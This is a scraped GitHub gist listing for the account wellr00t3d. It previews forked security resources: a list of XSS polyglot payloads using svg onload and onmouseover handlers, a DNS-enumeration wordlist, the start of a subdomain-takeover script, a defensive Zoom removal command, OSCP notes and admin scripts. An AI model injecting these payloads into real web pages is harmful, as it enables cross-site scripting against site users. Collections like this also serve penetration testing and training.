Keybase proof
I hereby claim:
- I am wellr00t3d on github.
- I am wellr00t3d (https://keybase.io/wellr00t3d) on keybase.
- I have a public key ASDm-BJAFHLhryWdjcHLMcGnL2ZX-oMCToBKUVL5VAHCWQo
To claim this, I am signing this object:
wellr00t3d
View test.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
wellr00t3d
/ test.svg
Last active Apr 7, 2022
View test.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
wellr00t3d
/ keybase.md
Created Oct 23, 2019
View keybase.md
wellr00t3d
/ xss-polyglots.txt
Last active Oct 9, 2019
— forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
View xss-polyglots.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
| javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
| javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
| javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
| javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
| javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
| javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
| javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript>< |
wellr00t3d
/ all.txt
Created Oct 5, 2019
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
wellr00t3d
/ second-order.py
Created Oct 2, 2019
— forked from PatrikHudak/second-order.py
Second-order subdomain takeover
View second-order.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| # python3 | |
| from urllib.parse import urlparse | |
| import requests | |
| import urllib3 | |
| from bs4 import BeautifulSoup |
wellr00t3d
/ zoom_fix.md
Created Jul 10, 2019
— forked from karanlyons/ZoomDaemon.yara
Fix for Unexpected Zoom Behavior
View zoom_fix.md
If you're using macOS, run these commands:
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file
wellr00t3d
/ gfid-resolver.sh
Created Oct 2, 2018
— forked from louiszuckerman/gfid-resolver.sh
Glusterfs GFID Resolver Turns a GFID into a real path in the brick
View gfid-resolver.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ "$#" < "2" || "$#" > "3" ]]; then | |
| cat <<END | |
| Glusterfs GFID resolver -- turns a GFID into a real file path | |
| Usage: $0 <brick-path> <gfid> [-q] | |
| <brick-path> : the path to your glusterfs brick (required) | |
wellr00t3d
/ how-to-oscp-final.md
Created Jun 29, 2018
— forked from unfo/how-to-oscp-final.md
View how-to-oscp-final.md
How to pass the OSCP
- Recon
- Find vuln
- Exploit
- Document it
Recon
Unicornscans in cli, nmap in msfconsole to help store loot in database.
View update_checker.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| DRUPALSITES=`find /var/www -name default.settings.php | grep -i '/htdocs/' 2> "/dev/null"` | |
| for site in $DRUPALSITES; do | |
| value=`echo $site | sed -e "s/\/sites\/default\/default.settings.php//"` | |
| echo $value | |
| echo | |
| DRUSHOUTPUT=`/usr/bin/php /opt/scripts/drush/drush.php --root=$value up -n 2>&1 | grep -E '(SECURITY|not supported)'` | |
| echo $DRUSHOUTPUT |